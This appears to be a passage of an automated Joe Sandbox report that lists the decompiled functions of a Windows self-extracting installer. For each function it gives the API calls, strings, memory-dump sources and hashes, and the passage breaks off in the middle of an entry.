Opcode ID: 0c6c46a489d0fda5dc98469ed81d9ee631a82016382c4a4d309c554a0bb4008b
Instruction ID: 74d312cc7bc09aff5b4987bc50d1242497c99ec41de507de56c8e978b471f2bf
Opcode Fuzzy Hash: 0c6c46a489d0fda5dc98469ed81d9ee631a82016382c4a4d309c554a0bb4008b
Instruction Fuzzy Hash: 5C511771A08B4686FB609B58E89C37933B1BF88748F4041B6DE4D866A4DF3CE845C748

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC42E28 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 149
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32 ref: 00007FF6BAC42EA3
LoadLibraryA.KERNEL32 ref: 00007FF6BAC42EC1
GetProcAddress.KERNEL32 ref: 00007FF6BAC42ED9
DecryptFileA.ADVAPI32 ref: 00007FF6BAC42EED
FreeLibrary.KERNEL32 ref: 00007FF6BAC42EF6
GetWindowsDirectoryA.KERNEL32 ref: 00007FF6BAC42F21
GetLastError.KERNEL32 ref: 00007FF6BAC42F49
SetCurrentDirectoryA.KERNELBASE ref: 00007FF6BAC42FA6

Part of subcall function 00007FF6BAC45C0C: LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF6BAC42E5F), ref: 00007FF6BAC45C31
Part of subcall function 00007FF6BAC45C0C: GetLastError.KERNEL32 ref: 00007FF6BAC45C5D

Strings

DecryptFileA, xrefs: 00007FF6BAC42ECF
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6BAC42EE6, 00007FF6BAC42F9F
advapi32.dll, xrefs: 00007FF6BAC42EA9

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Directory$ErrorLastLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystemWindows
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
API String ID: 89276366-3123416969
Opcode ID: 63ab0f0cfafc722fd92855fe59e1d804160e6a39c9ae7868f63f0a98d95c0c2e
Instruction ID: fe86204d101fe0203b70982d36925f72fd16d606237ab99bcca2130f5eb21361
Opcode Fuzzy Hash: 63ab0f0cfafc722fd92855fe59e1d804160e6a39c9ae7868f63f0a98d95c0c2e
Instruction Fuzzy Hash: BC616B20E0C65386FB61AB2DE98D37966B0AF90744F5040B5DF4DC62A6DF2CE845C70C

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC45E4C Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6BAC42A5F), ref: 00007FF6BAC45EE4
CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6BAC42A5F), ref: 00007FF6BAC45F91
RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6BAC42A5F), ref: 00007FF6BAC45FCB

Part of subcall function 00007FF6BAC45D44: RemoveDirectoryA.KERNELBASE(0000000A,00007FF6BAC42A5F), ref: 00007FF6BAC45DAF
Part of subcall function 00007FF6BAC45D44: GetFileAttributesA.KERNELBASE ref: 00007FF6BAC45DB8
Part of subcall function 00007FF6BAC45D44: GetTempFileNameA.KERNEL32 ref: 00007FF6BAC45DDB
Part of subcall function 00007FF6BAC45D44: DeleteFileA.KERNEL32 ref: 00007FF6BAC45DED
Part of subcall function 00007FF6BAC45D44: CreateDirectoryA.KERNEL32 ref: 00007FF6BAC45DF8

GetLastError.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6BAC42A5F), ref: 00007FF6BAC45FD3

Strings

alpha, xrefs: 00007FF6BAC45F0B
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6BAC45E90, 00007FF6BAC45F41
mips, xrefs: 00007FF6BAC45F14
i386, xrefs: 00007FF6BAC45F1D
ppc, xrefs: 00007FF6BAC45F02

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteErrorInfoLastNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
API String ID: 3170954203-3703068183
Opcode ID: 8d7551313fc669cb0e8f9ac69621eb77d6e6f085c422af71224765435ac923fb
Instruction ID: 3a47c2e680dc29ad3bfcfcf7c9849b788f67b6e8763a24ce1e2d015fd4e61f31
Opcode Fuzzy Hash: 8d7551313fc669cb0e8f9ac69621eb77d6e6f085c422af71224765435ac923fb
Instruction Fuzzy Hash: 33516B61E1C64681FB559B2DA8183B973B0AF45B80F9800B6DF4EC6695DF3DEC05C319

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC44478 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE ref: 00007FF6BAC444EC
WaitForSingleObject.KERNEL32 ref: 00007FF6BAC44502
GetExitCodeProcess.KERNELBASE ref: 00007FF6BAC44512
CloseHandle.KERNEL32 ref: 00007FF6BAC445AD
CloseHandle.KERNEL32 ref: 00007FF6BAC445B8
GetLastError.KERNEL32 ref: 00007FF6BAC445D3
GetLastError.KERNEL32 ref: 00007FF6BAC445ED
FormatMessageA.KERNEL32 ref: 00007FF6BAC44618

Strings

, xrefs: 00007FF6BAC444DF

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: CloseErrorHandleLastProcess$CodeCreateExitFormatMessageObjectSingleWait
String ID:
API String ID: 3794558871-3916222277
Opcode ID: 4b84cf1ab8d0678d6ac7c564e6789cc25d89905be34fe744c1dd92fa7fb220b0
Instruction ID: 47bda6ec79db5130ed558220a7f09ac3136f066669b03a399336a1106cb3c26e
Opcode Fuzzy Hash: 4b84cf1ab8d0678d6ac7c564e6789cc25d89905be34fe744c1dd92fa7fb220b0
Instruction Fuzzy Hash: A6511B32918A4287FB609B69E95D3BA73B0EB84759F100175EF8DC66A4CF7CD444CB08

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC429E4 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 79
libraryloadershutdownCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32 ref: 00007FF6BAC429F9
GetModuleHandleW.KERNEL32 ref: 00007FF6BAC42A10
GetProcAddress.KERNEL32 ref: 00007FF6BAC42A25
ExitWindowsEx.USER32 ref: 00007FF6BAC42AE6
CloseHandle.KERNEL32 ref: 00007FF6BAC42AFF

Strings

HeapSetInformation, xrefs: 00007FF6BAC42A1B
Kernel32.dll, xrefs: 00007FF6BAC42A09
@, xrefs: 00007FF6BAC42ABF

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Handle$AddressCloseExitModuleProcVersionWindows
String ID: @$HeapSetInformation$Kernel32.dll
API String ID: 1302179841-1204263913
Opcode ID: 69bcb6746adfe9857590511845fca8f5d0795747f8f0e8752e2d019c3da77bbf
Instruction ID: d209223e7ca7211edbc3f92113a53b108ebc4a84ecc619b71fb82e19e443a0d8
Opcode Fuzzy Hash: 69bcb6746adfe9857590511845fca8f5d0795747f8f0e8752e2d019c3da77bbf
Instruction Fuzzy Hash: 19315A21E0C35386FBB5AF6CA88E27A62B0AF54750F1440B5DF0DD26A5CF6CE441C61C

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC41F00 Relevance: 12.1, APIs: 8, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE ref: 00007FF6BAC41F99
lstrcmpA.KERNEL32 ref: 00007FF6BAC41FF2
lstrcmpA.KERNEL32 ref: 00007FF6BAC42008
SetFileAttributesA.KERNELBASE ref: 00007FF6BAC4205B
DeleteFileA.KERNELBASE ref: 00007FF6BAC42065
FindNextFileA.KERNELBASE ref: 00007FF6BAC42073
FindClose.KERNELBASE ref: 00007FF6BAC42084
RemoveDirectoryA.KERNELBASE ref: 00007FF6BAC4208D

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: e887f1d7ead07e2ce2074c96e4bbd04aba131085e79c48b9cf9fd632f58ef1eb
Instruction ID: 0077c0e44bf24501d77d0f011cec81b982478c331961b321a126d4d342416353
Opcode Fuzzy Hash: e887f1d7ead07e2ce2074c96e4bbd04aba131085e79c48b9cf9fd632f58ef1eb
Instruction Fuzzy Hash: 25418E72A18B8695EF11CF28D8582E927B1FB45B84F8441B2DF5D87699DF3CE90AC304

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC47F40 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 00007FF6BAC47F4B

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3c128b76d22e0f08333aca8b13059fe7dc42df365bac19dcaa2f659e341ad33d
Instruction ID: 68f03eb0513fc9cdc6b45fb8407c572974f0fe1e07d83d973b02fa7766cf3d14
Opcode Fuzzy Hash: 3c128b76d22e0f08333aca8b13059fe7dc42df365bac19dcaa2f659e341ad33d
Instruction Fuzzy Hash: 1FB09220E25442C1E604AB25DC8D06812B07B5C308FD008B0CA0DC0220DF1C919A8708

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC430C4 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 89
registryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNELBASE ref: 00007FF6BAC43109
DeleteFileA.KERNELBASE ref: 00007FF6BAC43112
LocalFree.KERNEL32 ref: 00007FF6BAC4311F
LocalFree.KERNEL32 ref: 00007FF6BAC43128
SetCurrentDirectoryA.KERNELBASE ref: 00007FF6BAC431B7
RegOpenKeyExA.KERNELBASE ref: 00007FF6BAC43204
RegDeleteValueA.KERNELBASE ref: 00007FF6BAC4321A
RegCloseKey.ADVAPI32 ref: 00007FF6BAC43225

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00007FF6BAC431F6
wextract_cleanup0, xrefs: 00007FF6BAC43213
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6BAC43158

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
API String ID: 3049360512-1423647952
Opcode ID: 139c24f63efaaecf273668afafadc40c041a4949118b42efaaf16138047ed078
Instruction ID: ef70d5454c6d0f17818487cd649c42a7ec22a089100d9aab4261ecb01bedd780
Opcode Fuzzy Hash: 139c24f63efaaecf273668afafadc40c041a4949118b42efaaf16138047ed078
Instruction Fuzzy Hash: A741F921A1CA4286FB619B29E89C3B937B0BF84B44F4441B5DF5D877A5DF2CE848C748

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC42174 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 70
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 00007FF6BAC421C5
RegQueryValueExA.KERNELBASE ref: 00007FF6BAC421EE
RegCloseKey.ADVAPI32 ref: 00007FF6BAC42203
RegOpenKeyExA.ADVAPI32 ref: 00007FF6BAC42231
RegQueryInfoKeyA.ADVAPI32 ref: 00007FF6BAC42273

Strings

PendingFileRenameOperations, xrefs: 00007FF6BAC421DC
System\CurrentControlSet\Control\Session Manager, xrefs: 00007FF6BAC421B7
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00007FF6BAC42223

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: f9c9f28ba430a97cac6df1d6b2180f89cf8a91fb3d1549dce7b445f5981c95c9
Instruction ID: 8f61ee2b6cbebec053030237d6ef795e0c957714c6278b39351964ec93064462
Opcode Fuzzy Hash: f9c9f28ba430a97cac6df1d6b2180f89cf8a91fb3d1549dce7b445f5981c95c9
Instruction Fuzzy Hash: 97318332A08B42C6E7608F69F8896A973B4FB48794F440675EB9D83B58DF38D560C708

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC45D44 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6BAC41144: _vsnprintf.MSVCRT ref: 00007FF6BAC41181

RemoveDirectoryA.KERNELBASE(0000000A,00007FF6BAC42A5F), ref: 00007FF6BAC45DAF
GetFileAttributesA.KERNELBASE ref: 00007FF6BAC45DB8
GetTempFileNameA.KERNEL32 ref: 00007FF6BAC45DDB
DeleteFileA.KERNEL32 ref: 00007FF6BAC45DED
CreateDirectoryA.KERNEL32 ref: 00007FF6BAC45DF8
CreateDirectoryA.KERNELBASE ref: 00007FF6BAC45E28

Strings

IXP, xrefs: 00007FF6BAC45DCE
IXP%03d.TMP, xrefs: 00007FF6BAC45D72

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: IXP$IXP%03d.TMP
API String ID: 1082909758-3932986939
Opcode ID: 5a71516873949a24748eb98aa66fa85a224b2ff9622eba3932d282d47951f613
Instruction ID: 831ce44621fb94c1d83be991d5f3b2f0f2948c2a660fb29b0d99a904638824f7
Opcode Fuzzy Hash: 5a71516873949a24748eb98aa66fa85a224b2ff9622eba3932d282d47951f613
Instruction Fuzzy Hash: 6E215031B0C95142FB249B2EE9983F96271AF89B84F444171DF4EC7AA5CF3CE946C608

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC45C0C Relevance: 13.6, APIs: 6, Strings: 3, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6BAC44CC0: FindResourceA.KERNEL32 ref: 00007FF6BAC44CE8
Part of subcall function 00007FF6BAC44CC0: SizeofResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44CF3
Part of subcall function 00007FF6BAC44CC0: FindResourceA.KERNEL32 ref: 00007FF6BAC44D13
Part of subcall function 00007FF6BAC44CC0: LoadResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D1E
Part of subcall function 00007FF6BAC44CC0: LockResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D27
Part of subcall function 00007FF6BAC44CC0: memcpy_s.MSVCRT ref: 00007FF6BAC44D40
Part of subcall function 00007FF6BAC44CC0: FreeResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D49

LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF6BAC42E5F), ref: 00007FF6BAC45C31
GetLastError.KERNEL32 ref: 00007FF6BAC45C5D
LocalFree.KERNEL32 ref: 00007FF6BAC45CB3

Part of subcall function 00007FF6BAC44A70: LoadStringA.USER32 ref: 00007FF6BAC44B04
Part of subcall function 00007FF6BAC44A70: MessageBoxA.USER32 ref: 00007FF6BAC44B3E

Strings

, xrefs: 00007FF6BAC45CF7
<None>, xrefs: 00007FF6BAC45CC5
UPROMPT, xrefs: 00007FF6BAC45C19, 00007FF6BAC45C7F

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: $<None>$UPROMPT
API String ID: 957408736-2569542085
Opcode ID: 4cd7dd6834e85b2f75631053cfae32537cc947d9a4b936279775a0e79ed0ed39
Instruction ID: 8a063c312d85b39be49ff12da52f4e40b226cc86db099a403a2a6b2bc39d5834
Opcode Fuzzy Hash: 4cd7dd6834e85b2f75631053cfae32537cc947d9a4b936279775a0e79ed0ed39
Instruction Fuzzy Hash: 51317C71A0C60687F7609B29A6AD37A32B0AF84788F104079DF4EC6A95DF7DD8408B08

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC4648C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71memoryfileCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FF6BAC464BC
GetLastError.KERNEL32 ref: 00007FF6BAC464E8
CreateFileA.KERNELBASE ref: 00007FF6BAC4655D
LocalFree.KERNEL32 ref: 00007FF6BAC46569
CloseHandle.KERNEL32 ref: 00007FF6BAC4657C
GetFileAttributesA.KERNELBASE ref: 00007FF6BAC46585

Strings

TMP4351$.TMP, xrefs: 00007FF6BAC46527

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateErrorFreeHandleLast
String ID: TMP4351$.TMP
API String ID: 3233701622-2619824408
Opcode ID: 2eb0a130c08390c2c59571b17b69df89c48dd1a812f9b9ed4787ed34bbd363ff
Instruction ID: f58c8ee9c6af874bfd0ee88032590290b37f037d5f4eca7ee37327b07609aef0
Opcode Fuzzy Hash: 2eb0a130c08390c2c59571b17b69df89c48dd1a812f9b9ed4787ed34bbd363ff
Instruction Fuzzy Hash: C421C171A0875247FB209B29A85837A72A0AB44BB4F545378DF6E83BD9DF3CD4058708

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC479B0 Relevance: 12.1, APIs: 8, Instructions: 137sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BAC48114: GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6BAC48144
Part of subcall function 00007FF6BAC48114: GetCurrentProcessId.KERNEL32 ref: 00007FF6BAC48152
Part of subcall function 00007FF6BAC48114: GetCurrentThreadId.KERNEL32 ref: 00007FF6BAC4815E
Part of subcall function 00007FF6BAC48114: GetTickCount.KERNEL32 ref: 00007FF6BAC4816A
Part of subcall function 00007FF6BAC48114: GetTickCount.KERNEL32 ref: 00007FF6BAC4817A
Part of subcall function 00007FF6BAC48114: QueryPerformanceCounter.KERNEL32 ref: 00007FF6BAC48195

GetStartupInfoW.KERNEL32 ref: 00007FF6BAC479E5
_amsg_exit.MSVCRT ref: 00007FF6BAC47A20
Sleep.KERNEL32 ref: 00007FF6BAC47A2C
_initterm.MSVCRT ref: 00007FF6BAC47ABA
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6BAC47AE7
exit.KERNELBASE ref: 00007FF6BAC47B78
_cexit.MSVCRT ref: 00007FF6BAC47B87
_ismbblead.MSVCRT ref: 00007FF6BAC47BAA

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
String ID:
API String ID: 2995914023-0
Opcode ID: 40f232f804d3de6f42de40c3d46f48b6aa97a76c85812b48c9ef079cce016815
Instruction ID: 3e5805b72b9bed0c3e009604dbefbcb0db1755f31a0bbae709e2154de9f78cf4
Opcode Fuzzy Hash: 40f232f804d3de6f42de40c3d46f48b6aa97a76c85812b48c9ef079cce016815
Instruction Fuzzy Hash: C9511731A0C64286FB608B29E88837927B0FF48754F6850B5DF4DC26A5DF3CE945C718

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC44FA0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

lstrcmpA.KERNEL32 ref: 00007FF6BAC45027
CreateFileA.KERNELBASE ref: 00007FF6BAC450DF
CreateFileA.KERNEL32 ref: 00007FF6BAC45186

Strings

*MEMCAB, xrefs: 00007FF6BAC4501D

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: CreateFile$lstrcmp
String ID: *MEMCAB
API String ID: 1301100335-3211172518
Opcode ID: 8a2ec7afe2b51a4f3a104787b125c2abcbb1919d4f600384edff3266c69d9446
Instruction ID: 92704415bb6b2541f0ea0d4df4d073f47146c74411e9632a2c767cdae36522af
Opcode Fuzzy Hash: 8a2ec7afe2b51a4f3a104787b125c2abcbb1919d4f600384edff3266c69d9446
Instruction Fuzzy Hash: 9B61B162E0874A46FB608B1DA4883797AB1AB55BB4F5443B5DF6E826D0CF3CAC458708

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC45480 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 147timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32 ref: 00007FF6BAC4555F
LocalFileTimeToFileTime.KERNEL32 ref: 00007FF6BAC45577
SetFileTime.KERNELBASE ref: 00007FF6BAC45599
SetFileAttributesA.KERNELBASE ref: 00007FF6BAC455C9
SetDlgItemTextA.USER32 ref: 00007FF6BAC455F6

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6BAC4550B, 00007FF6BAC4560C

